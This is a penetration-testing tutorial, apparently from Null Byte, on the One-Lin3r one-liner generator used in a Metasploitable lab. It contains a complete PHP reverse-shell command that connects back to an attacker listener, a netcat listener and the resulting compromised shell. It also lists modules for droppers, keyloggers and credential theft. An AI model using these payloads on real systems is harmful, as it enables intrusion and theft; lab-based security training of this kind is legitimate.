How to Use One-Lin3r to Quickly Generate Reverse Shells, Privesc Commands & More

Dec 25, 2019 03:00 PM
Jun 16, 2020 10:56 PM
636991291650421437.jpg

A lot of time can be wasted performing trivial tasks over and over again, and it's especially true when it comes to hacking and penetration testing. Trying different shells to own a target, and testing out privilege escalation commands afterward, can eat up a lot of time. Fortunately, there is a tool called One-Lin3r that can quickly generate shells, privesc commands, and more.

One-Lin3r is a Python tool that acts as a framework to automate the generation of one-liners commonly used in pentesting and hacking. Its usage is very similar to Metasploit, so it's natural and simple to pick up for most people. The tool contains features such as auto-complete, search suggestion, automatic copying, and smart searching, making it a breeze to find whatever you're looking for.

In this tutorial, we will be using Metasploitable 2 as the target and Kali Linux as our local machine. You can use a similar setup to follow along. Once we get to Step 6 below, things will vary based on which one-liner you choose, so things could be very different since we're only showing a few examples here.

Step 1: Install One-Lin3r

The first thing we need to do is install One-Lin3r. It requires Python 3, so the easiest way to do this is with pip3. It will install the tool along with any dependencies it may need. If you don't have pip3, you can install it with:

~# apt install python3-pip

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  python-pip-whl
The following packages will be upgraded:
  python-pip-whl python3-pip
2 upgraded, 0 newly installed, 0 to remove and 500 not upgraded.
Need to get 2,054 kB of archives.
After this operation, 125 kB disk space will be freed.
Do you want to continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB]
Fetched 2,054 kB in 1s (2,792 kB/s)
Reading changelogs... Done
(Reading database ... 358625 files and directories currently installed.)
Preparing to unpack .../python3-pip_20.0.2-5kali1_all.deb ...
Unpacking python3-pip (20.0.2-5kali1) over (20.0.2-5) ...
Preparing to unpack .../python-pip-whl_20.0.2-5kali1_all.deb ...
Unpacking python-pip-whl (20.0.2-5kali1) over (20.0.2-5) ...
Setting up python-pip-whl (20.0.2-5kali1) ...
Setting up python3-pip (20.0.2-5kali1) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

Then, to install One-Lin3r, use:

~# pip3 install one-lin3r

Collecting one-lin3r
  Downloading one-lin3r-2.1.tar.gz (530 kB)
     |████████████████████████████████| 530 kB 1.1 MB/s
Requirement already satisfied: prompt_toolkit in /usr/lib/python3/dist-packages (from one-lin3r) (3.0.5)
Requirement already satisfied: pyperclip in /usr/lib/python3/dist-packages (from one-lin3r) (1.8.0)
Collecting terminaltables
  Downloading terminaltables-3.1.0.tar.gz (12 kB)
Building wheels for collected packages: one-lin3r, terminaltables
  Building wheel for one-lin3r (setup.py) ... done
  Created wheel for one-lin3r: filename=one_lin3r-2.1-py3-none-any.whl size=98517 sha256=4a8b3602329c770cb1c5a0af6fce25068e1c6ca9298c0b1dbee469856f67f403
  Stored in directory: /home/kali/.cache/pip/wheels/77/05/5a/6cfde98092f3a965cbc9b34ceacdaa306f7860238ace2b507e
  Building wheel for terminaltables (setup.py) ... done
  Created wheel for terminaltables: filename=terminaltables-3.1.0-py3-none-any.whl size=15354 sha256=d27bd634201dfb06449264a7bf3eea578bdff2b786b6923bb44ee9f9e8908d7f
  Stored in directory: /home/kali/.cache/pip/wheels/08/8f/5f/253d0105a55bd84ee61ef0d37dbf70421e61e0cd70cef7c5e1
Successfully built one-lin3r terminaltables
Installing collected packages: terminaltables, one-lin3r
Successfully installed one-lin3r-2.1 terminaltables-3.1.0

If you get a warning about how one-lin3r is installed in a directory that's not on PATH, open up your ~/.bashrc file in a text editor like nano or vim and add "export PATH=$PATH:/" followed by the path of the script at the end of the file and save it.

Step 2: Get to Know Its Basic Usage

Now, we can run the basic help menu by tacking on the -h flag:

~# one-lin3r -h

usage: One-Lin3r.py [-h] [-r R] [-x X] [-q]

optional arguments:
  -h, --help  show this help message and exit
  -r R        Execute a resource file.
  -x X        Execute a specific command (use ; for multiples).
  -q          Quiet mode (no banner).

One-Lin3r is a framework, so to really get into it, we need to start it up. Simply type one-lin3r in the terminal to do so:

~# one-lin3r

               zeeeeee-
              z$$$$$$"
             d$$$$$$"
            d$$$$$P
           d$$$$$P
          $$$$$$"
        .$$$$$$"
       .$$$$$$"
      4$$$$$$$$$$$$$"
     z$$$$$$$$$$$$$"
     """""""3$$$$$"
           z$$$$P
          d$$$$"        One-Lin3r By D4Vinci - V2.1
        .$$$$$"           A framework where all your liners belongs to...
       z$$$$$"              Loaded 176 liner(s).
      z$$$$P
     d$$$$$$$$$$"
    *******$$$"
         .$$$"
        .$$"
       4$P"
      z$"
     zP
    z"
   /
  ^

OneLiner >

Once it starts, we're greeted with a banner, much like what happens when starting the Metasploit Framework. In fact, most of the commands and usage of this tool are very similar to Metasploit, so most of us should feel right at home.

Typing help or ? will give us the detailed help menu:

OneLiner > ?

    Command                 Description
    --------                -------------
    help/?                  Show this help menu.
    list/show               List all one-liners in the database.
    search   [Keywords..]   Search database for a specific liner by its name, author name or description.
    use       <liner>       Use an available one-liner.
    copy      <liner>       Use an available one-liner and copy it to clipboard automatically.
    info      <liner>       Get information about an available liner.
    set <variable> <value>  Sets a context-specific variable to a value to use while using one-liners.
    variables               Prints all previously specified variables.
    banner                  Display banner.
    reload/refresh          Reload the liners database.
    check                   Prints the core version and checks if you are up-to-date.
    history                 Display command-line most important history from the beginning.
    makerc                  Save command-line history to a file.
    resource    <file>      Run the commands stored in a file
    os         <command>    Execute a system command without closing the framework
    exit/quit               Exit the framework

Since we are restricted to the framework prompt while running One-Lin3r, it's useful to be able to run operating system commands while working. Use the os keyword followed by whatever command you wish to run to do this. For example:

OneLiner > os uname -a

Linux kali 5.5.0-kali2-amd64 #1 SMP Debian 5.5.17-1kali1 (2020-04-21) x86_64 GNU/Linux

Step 3: List the One-Liners

We can use the list command to display all of the available one-liners the tool has to offer. It will list the names and associated functions of each one. As of June 16, 2020, there are 176 one-liners available.

OneLiner > list

 #   | Name                                                        | Function
-----+-------------------------------------------------------------+--------------------
 1   | linux/awk/reverse_udp                                       | Reverse Shell
 2   | linux/awk/bind_tcp                                          | Bind Shell
 3   | linux/awk/reverse_tcp                                       | Reverse Shell
 4   | linux/ncat/reverse_udp                                      | Reverse Shell
 5   | linux/ncat/reverse_tcp_ssl                                  | Reverse Shell
 6   | linux/ncat/reverse_tcp                                      | Reverse Shell
 7   | linux/openssl/reverse_tcp                                   | Reverse Shell
 8   | linux/nodejs/reverse_tcp                                    | Reverse Shell
 9   | linux/nc/reverse_udp                                        | Reverse Shell
 10  | linux/nc/reverse_tcp_mknod                                  | Reverse Shell
 11  | linux/nc/bind_tcp                                           | Bind Shell
 12  | linux/nc/reverse_tcp_mkfifo                                 | Reverse Shell
 13  | linux/nc/bind_tcp_mkfifo                                    | Bind Shell
 14  | linux/nc/reverse_tcp                                        | Reverse Shell
 15  | linux/go/reverse_tcp                                        | Reverse Shell
 16  | linux/java/reverse_tcp                                      | Reverse Shell
 17  | linux/perl/bind_udp                                         | Bind Shell
 18  | linux/perl/reverse_udp_miosocket                            | Reverse Shell
 19  | linux/perl/bind_tcp                                         | Bind Shell
 20  | linux/perl/reverse_tcp_miosocket                            | Reverse Shell
 21  | linux/perl/reverse_tcp                                      | Reverse Shell
 22  | linux/python/reverse_udp                                    | Reverse Shell
 23  | linux/python/bind_udp                                       | Bind Shell
 24  | linux/python/http_server                                    | Dropper
 25  | linux/python/bind_tcp                                       | Bind Shell
 26  | linux/python/reverse_tcp_interactive                        | Reverse Shell
 27  | linux/python/reverse_tcp                                    | Reverse Shell
 28  | linux/php/bind_udp                                          | Bind Shell
 29  | linux/php/bind_tcp                                          | Bind Shell
 30  | linux/php/reverse_tcp                                       | Reverse Shell
 31  | linux/telnet/reverse_tcp_mknod                              | Reverse Shell
 32  | linux/telnet/reverse_tcp_mkfifo                             | Reverse Shell
 33  | linux/lua/reverse_tcp_bash                                  | Reverse Shell
 34  | linux/lua/reverse_tcp                                       | Reverse Shell
 35  | linux/ruby/bind_udp                                         | Bind Shell
 36  | linux/ruby/bind_tcp                                         | Bind Shell
 37  | linux/ruby/reverse_tcp                                      | Reverse Shell
 38  | linux/socat/bind_udp                                        | Bind Shell
 39  | linux/socat/reverse_tcp                                     | Reverse Shell
 40  | linux/bash/list_cronjobs_for_current_user                   | PrivEsc
 41  | linux/bash/get_bash_history_for_all_user                    | PrivEsc
 42  | linux/bash/search_for_writeable_folders_files               | PrivEsc
 43  | linux/bash/search_for_password_using_grep                   | PrivEsc
 44  | linux/bash/find_suid                                        | PrivEsc
 45  | linux/bash/get_ssh_private_keys_for_all_users               | PrivEsc
 46  | linux/bash/get_apache_site_enabled                          | PrivEsc
 47  | linux/bash/get_aws_security_credentials                     | PrivEsc
 48  | linux/bash/search_for_password_using_find                   | PrivEsc
 49  | linux/bash/list_systemd_timers                              | PrivEsc
 50  | linux/bash/reverse_tcp_exec                                 | Reverse Shell
 51  | linux/bash/search_for_password_in_memory                    | PrivEsc
 52  | linux/bash/exploit_writeable_sudoers                        | PrivEsc
 53  | linux/bash/get_last_edited_files                            | PrivEsc
 54  | linux/bash/list_all_capabilities                            | PrivEsc
 55  | linux/bash/reverse_tcp                                      | Reverse Shell
 56  | linux/bash/list_cronjobs_for_all_users                      | PrivEsc
 57  | linux/bash/exploit_docker_bash_container                    | PrivEsc
 58  | linux/bash/list_cronjobs_for_another_user                   | PrivEsc
 59  | linux/tclsh/reverse_tcp                                     | Reverse Shell
 60  | multi/msfvenom/linux_elf_reverse_meterpreter                | Msfvenom Generator
 61  | multi/msfvenom/java_jsp_reverse_shell                       | Msfvenom Generator
 62  | multi/msfvenom/windows_asp_reverse_meterpreter              | Msfvenom Generator
 63  | multi/msfvenom/unix_perl_reverse_shell                      | Msfvenom Generator
 64  | multi/msfvenom/php_reverse_meterpreter                      | Msfvenom Generator
 65  | multi/msfvenom/unix_python_reverse_shell                    | Msfvenom Generator
 66  | multi/msfvenom/unix_bash_reverse_shell                      | Msfvenom Generator
 67  | multi/msfvenom/windows_exe_reverse_meterpreter              | Msfvenom Generator
 68  | multi/msfvenom/java_war_reverse_shell                       | Msfvenom Generator
 69  | multi/msfvenom/osx_macho_reverse_shell                      | Msfvenom Generator
 70  | multi/nmap/ftp_bruteforce                                   | Nmap script
 71  | multi/nmap/http_enumerate                                   | Nmap script
 72  | multi/nmap/full_vulnerability_scan                          | Nmap script
 73  | multi/nmap/google_malware_check                             | Nmap script
 74  | multi/nmap/common_malware_scan                              | Nmap script
 75  | multi/nmap/slowloris_attack                                 | Nmap script
 76  | windows/cmd/dll_dropper_rundll32                            | Dropper
 77  | windows/cmd/win_remote_management                           | Execute
 78  | windows/cmd/search_for_passwords                            | PrivEsc
 79  | windows/cmd/exe_dropper_bitsadmin                           | Dropper
 80  | windows/cmd/read_registry_winlogon_key                      | PrivEsc
 81  | windows/cmd/list_scheduled_tasks                            | PrivEsc
 82  | windows/cmd/exe_dropper_certutil                            | Dropper
 83  | windows/cmd/read_registry_runonce_key                       | PrivEsc
 84  | windows/cmd/list_arp_tables                                 | PrivEsc
 85  | windows/cmd/runas_with_creds                                | Execute
 86  | windows/cmd/list_processes_running_as_system                | PrivEsc
 87  | windows/cmd/read_registry_always_install_elevated_key_lm    | PrivEsc
 88  | windows/cmd/list_localgroups                                | PrivEsc
 89  | windows/cmd/hta_dropper_mshta                               | Dropper
 90  | windows/cmd/list_startup_folder_currentuser                 | PrivEsc
 91  | windows/cmd/read_registry_always_install_elevated_key_cu    | PrivEsc
 92  | windows/cmd/read_firewall_config                            | PrivEsc
 93  | windows/cmd/list_logon_requirements                         | PrivEsc
 94  | windows/cmd/get_systeminfo                                  | PrivEsc
 95  | windows/cmd/list_routing_tables                             | PrivEsc
 96  | windows/cmd/read_registry_putty_sessions                    | PrivEsc
 97  | windows/cmd/search_registry_for_passwords_lm                | PrivEsc
 98  | windows/cmd/list_startup_folder_allusers                    | PrivEsc
 99  | windows/cmd/read_registry_vnc_passwords                     | PrivEsc
 100 | windows/cmd/xsl_dropper_wmic                                | Dropper
 101 | windows/cmd/list_network_shares                             | PrivEsc
 102 | windows/cmd/sct_dropper_rundll32                            | Dropper
 103 | windows/cmd/search_registry_for_passwords_cu                | PrivEsc
 104 | windows/cmd/msi_quiet_installer                             | Execute
 105 | windows/cmd/get_saved_wifi_passwords                        | PrivEsc
 106 | windows/cmd/sct_dropper_regsvr32                            | Dropper
 107 | windows/cmd/bat_dropper                                     | Dropper
 108 | windows/cmd/list_installed_updates                          | PrivEsc
 109 | windows/cmd/list_users                                      | PrivEsc
 110 | windows/cmd/list_running_processes                          | PrivEsc
 111 | windows/cmd/dll_dropper_regasm                              | Dropper
 112 | windows/cmd/execute_over_forfiles                           | Execute
 113 | windows/cmd/list_user_privileges                            | PrivEsc
 114 | windows/cmd/read_services_with_wmic                         | PrivEsc
 115 | windows/cmd/get_snmp_config                                 | PrivEsc
 116 | windows/cmd/sct_dropper_mshta                               | Dropper
 117 | windows/cmd/get_architecture                                | PrivEsc
 118 | windows/cmd/read_services_with_tasklist                     | PrivEsc
 119 | windows/cmd/read_registry_snmp_key                          | PrivEsc
 120 | windows/cmd/list_current_connections                        | PrivEsc
 121 | windows/cmd/dll_dropper_certutil_base64                     | Dropper
 122 | windows/cmd/read_registry_run_key                           | PrivEsc
 123 | windows/cmd/list_unqouted_services                          | PrivEsc
 124 | windows/cmd/execute_c#_files                                | Execute
 125 | windows/cmd/list_drives                                     | PrivEsc
 126 | windows/cmd/disable_firewall_netsh                          | PrivEsc
 127 | windows/cmd/list_network_interfaces                         | PrivEsc
 128 | windows/cmd/msi_dropper_wininstaller                        | Dropper
 129 | windows/cmd/dll_loader_control_panel                        | Loader
 130 | windows/cmd/read_registry_r_key                             | PrivEsc
 131 | windows/cmd/list_startup_tasks_with_wmic                    | PrivEsc
 132 | windows/cmd/dll_loader_word                                 | Loader
 133 | windows/cmd/get_saved_wifi_aps_ssid                         | PrivEsc
 134 | windows/scan/check_netapi                                   | Nmap script
 135 | windows/scan/check_eternal_blue                             | Nmap script
 136 | windows/wsl/runas_with_creds                                | Execute
 137 | windows/nc/bind_tcp                                         | Bind Shell
 138 | windows/nc/reverse_tcp                                      | Reverse Shell
 139 | windows/perl/bind_udp                                       | Bind Shell
 140 | windows/perl/bind_tcp                                       | Bind Shell
 141 | windows/perl/reverse_tcp                                    | Reverse Shell
 142 | windows/groovysh/reverse_tcp                                | Reverse Shell
 143 | windows/python/bind_udp                                     | Bind Shell
 144 | windows/python/bind_tcp                                     | Bind Shell
 145 | windows/python/reverse_tcp_threaded                         | Reverse Shell
 146 | windows/python/reverse_tcp                                  | Reverse Shell
 147 | windows/php/bind_udp                                        | Bind Shell
 148 | windows/php/bind_tcp                                        | Bind Shell
 149 | windows/lua/reverse_tcp                                     | Reverse Shell
 150 | windows/ruby/bind_udp                                       | Bind Shell
 151 | windows/ruby/bind_tcp                                       | Bind Shell
 152 | windows/ruby/reverse_tcp                                    | Reverse Shell
 153 | windows/powershell/list_installed_programs_using_folders    | PrivEsc
 154 | windows/powershell/list_scheduled_tasks                     | PrivEsc
 155 | windows/powershell/list_arp_tables                          | PrivEsc
 156 | windows/powershell/get_iis_config                           | PrivEsc
 157 | windows/powershell/ps1_dropper                              | Dropper
 158 | windows/powershell/setup_powerup_powertools                 | PrivEsc
 159 | windows/powershell/reverse_tcp_string                       | Reverse Shell
 160 | windows/powershell/list_routing_tables                      | PrivEsc
 161 | windows/powershell/bind_tcp                                 | Bind Shell
 162 | windows/powershell/get_saved_wifi_passwords                 | PrivEsc
 163 | windows/powershell/list_installed_programs_using_registry   | PrivEsc
 164 | windows/powershell/list_running_processes                   | PrivEsc
 165 | windows/powershell/meterpreter_shell                        | Reverse Shell
 166 | windows/powershell/setup_session_gopher                     | PrivEsc
 167 | windows/powershell/list_unqouted_services                   | PrivEsc
 168 | windows/powershell/setup_keylogger_powersploit              | Keylogger
 169 | windows/powershell/get_passwords_from_memory_using_mimikatz | PrivEsc
 170 | windows/powershell/ps1_dropper_rundll32                     | Dropper
 171 | windows/powershell/reverse_tcp                              | Reverse Shell
 172 | windows/powershell/list_network_interfaces                  | PrivEsc
 173 | windows/powershell/ps1_dropper_microsoft_syncappv           | Dropper
 174 | openbsd/nc/bind_udp                                         | Bind Shell
 175 | openbsd/nc/reverse_tcp                                      | Reverse Shell
 176 | openbsd/bash/read_doas_config                               | PrivEsc

Step 4: Search for a One-Liner

We can also search for specific items using the search command. This is something that One-Lin3r is really good at. It not only has auto-complete capabilities, but it also knows what you are trying to search for by offering suggestions and allowing partial search terms.

For instance, let's say we wanted some kind of PHP shell for Linux. We don't need to type the full path for the tool to find what we are looking for.

OneLiner > search linux php

 #   | Name                  | Function
-----+-----------------------+---------------
 1   | linux/php/bind_udp    | Bind Shell
 2   | linux/php/bind_tcp    | Bind Shell
 3   | linux/php/reverse_tcp | Reverse Shell

Step 5: Get More Info About a One-Liner

We can get information about a specific one-liner with the info command, which will give us a short description of the item, including its author, function, and variables that are used.

OneLiner > info linux/php/reverse_tcp

[+] Liner added by => vesche
[+] Function       => Reverse Shell
[+] Variables used => TARGET, PORT
[+] Description    => Uses PHP sockets & exec to create a reverse shell.

Step 6: Load Any One-Liner

Once we've found a suitable item, we can load it with the use command. I'm using a reverse shell as an example. Once we do so, it will give us the actual line that we need to copy and run.

OneLiner > use linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("TARGET",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

Step 7: List & Set Variables

In this example, we can see there are parameters for the target and port. To display current variables and their associated values, simply type variables at the prompt:

OneLiner > variables

 # | Name      | Value
---+-----------+-------
 1 | TARGET    | None
 2 | PORT      | None
 3 | URL       | None
 4 | COMMAND   | None
 5 | FILE_PATH | None
 6 | USERNAME  | None
 7 | PASSWORD  | None

Now we are able to set values for these variables, much like how we do in Metasploit. Since we are generating a reverse shell here, we need to set the target to the IP address of our local machine:

OneLiner > set target 10.10.0.1

[+] Variable target set to 10.10.0.1

And the desired port so it can connect back to our listener:

OneLiner > set port 4321

[+] Variable port set to 4321

Now when we display the variables again, we can see that our values are set:

OneLiner > variables

 # | Name      | Value
---+-----------+-----------
 1 | TARGET    | 10.10.0.1
 2 | PORT      | 4321
 3 | URL       | None
 4 | COMMAND   | None
 5 | FILE_PATH | None
 6 | USERNAME  | None
 7 | PASSWORD  | None

Step 8: Use the Chosen One-Liner

Let's try this out. First, we need to set up a listener so we can catch the incoming connection from the target. Netcat is always a good choice, which we'd use in a new terminal window:

~# nc -lvp 4321

listening on [any] 4321 ...

Next, back in the One-Lin3r terminal window, load the one-liner to get the full command. We can see that the target and port variables are now filled in with our values:

OneLiner > use linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'

We could just copy this command like normal, but One-Lin3r actually has a feature to automate this for us. Instead of loading an item with the use command, load it with the copy command — this will automatically copy what we need right to the clipboard:

OneLiner > copy linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
[+] Liner copied to clipboard successfully!

From here, it's time to exploit the target. Feel free to do this however you want, but command injection is always a favorite of mine. Once we exploit the target and run our reverse shell command, we should see a connection open up on our local machine:

10.10.0.50: inverse host lookup failed: Unknown host
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 56718
sh: no job control in this shell
sh-3.2$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can now run commands like id to verify we have compromised a user on the system.

Step 9: Perform Privilege Escalation

Now that we have a shell on the system as a limited user, the next step to take would be privilege escalation. Fortunately, One-Lin3r also contains some handy privesc commands for us to generate.

First things first, let's upgrade this shell we have to a fully interactive TTY session so we have more control over what we're doing.

Now that we have a decent shell, let's find a potential privesc command to use. I usually like to work out of a world-writable directory during post-exploitation so I can write and execute whatever I want — /var/tmp is a good bet:

www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp

Now, back in One-Lin3r, we can search for an appropriate privesc for Linux:

OneLiner > search linux privesc

 #   | Name                                          | Function
-----+-----------------------------------------------+----------
 1   | linux/bash/list_cronjobs_for_current_user     | PrivEsc
 2   | linux/bash/get_bash_history_for_all_user      | PrivEsc
 3   | linux/bash/search_for_writeable_folders_files | PrivEsc
 4   | linux/bash/search_for_password_using_grep     | PrivEsc
 5   | linux/bash/find_suid                          | PrivEsc
 6   | linux/bash/get_ssh_private_keys_for_all_users | PrivEsc
 7   | linux/bash/get_apache_site_enabled            | PrivEsc
 8   | linux/bash/get_aws_security_credentials       | PrivEsc
 9   | linux/bash/search_for_password_using_find     | PrivEsc
 10  | linux/bash/list_systemd_timers                | PrivEsc
 11  | linux/bash/search_for_password_in_memory      | PrivEsc
 12  | linux/bash/exploit_writeable_sudoers          | PrivEsc
 13  | linux/bash/get_last_edited_files              | PrivEsc
 14  | linux/bash/list_all_capabilities              | PrivEsc
 15  | linux/bash/list_cronjobs_for_all_users        | PrivEsc
 16  | linux/bash/exploit_docker_bash_container      | PrivEsc
 17  | linux/bash/list_cronjobs_for_another_user     | PrivEsc

Let's take a look at this one, which will list any cron jobs for the current user:

OneLiner > info linux/bash/list_cronjobs_for_current_user

[+] Liner added by => Karim shoair (D4Vinci)
[+] Function       => PrivEsc
[+] Variables used => None
[+] Description    => List all crob jobs for current user

Seems pretty straightforward, and we don't even need to set any variables. Use the copy command to copy it straight to the clipboard:

OneLiner > copy linux/bash/list_cronjobs_for_current_user

[+] Your liner is: crontab -l
[+] Liner copied to clipboard successfully!

We can see it still tells us what it generates, but we save an extra step by copying the command automatically. The only thing left to do is run the one-liner on the target:

www-data@metasploitable:/var/tmp$ crontab -l

no crontab for www-data

We can see in this particular instance there are no cron jobs for this user, but One-Lin3r makes it easy to have some common privesc commands right at our fingertips.

Wrapping Up

Today, we explored a tool called One-Lin3r and how to use it to quickly generate shells, privilege escalation commands, and more. We tested it out by using a PHP reverse shell to compromise the target, then tried to escalate privileges by generating a command to check for cron jobs. With an interface that feels familiar to any Metasploit user, One-Lin3r makes it easy to hack on the fly.

Cover image by EVG photos/Pexels; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!